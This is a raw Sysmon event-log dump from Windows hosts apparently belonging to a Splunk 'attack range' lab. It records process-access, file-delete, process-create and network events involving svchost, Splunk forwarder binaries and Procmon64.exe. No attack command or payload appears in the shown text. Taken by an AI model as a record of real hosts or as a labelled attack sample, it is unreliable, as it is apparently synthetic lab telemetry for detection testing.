10:55:49.348{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12B5-6216-7E04-000000003902}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B5-6216-7E04-000000003902}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.348{4F8D34B0-12B5-6216-7E04-000000003902}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:46.591{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51400-false10.0.1.12-8000- 10341000x8000000000000000289763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.231{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-FBF6-6215-0602-000000003802}5704C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.231{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-FBF6-6215-0602-000000003802}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.231{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.184{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.184{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.169{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5C01-000000003802}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.153{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.068{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F400-000000003802}4928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.053{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.029{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F3BE-6215-F300-000000003802}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:49.029{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:50.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB351DA59514AD5B43304CABC13412ED,SHA256=099104C6050AB790E3BAA10B0EA92A34FAB351737DAD3F7E654511F2A76F0C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:50.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63E0F57E0E14ECCA934DB5719B77D1DD,SHA256=47242357943ED6ED117A1595766DE1D3AD0FC63664568E9D6F45F850DCB907FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:50.394{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=866BEE3508DC55C355D97D57EE319EBC,SHA256=C66C2ED62B0EF9E09C11E9BCF2B4CBE6DE18ED7F878CD64B445CCDB96FC9BBA0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:50.098{4F8D34B0-12B5-6216-7F04-000000003902}34243200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.738{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF149AF6ABD35C1A473A529B9414DA62,SHA256=4CAF8D07FA726FED0E5ED234F77D861B47D601EDB3679B307A20123575501537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:51.302{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B7B4BD2EE7B5E70EAA8B44E344183C,SHA256=AAB31EA77804A9395E4F8857CF73818BC42144CB15B9E2F773CFFCA3249E9C2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B7-6216-8004-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 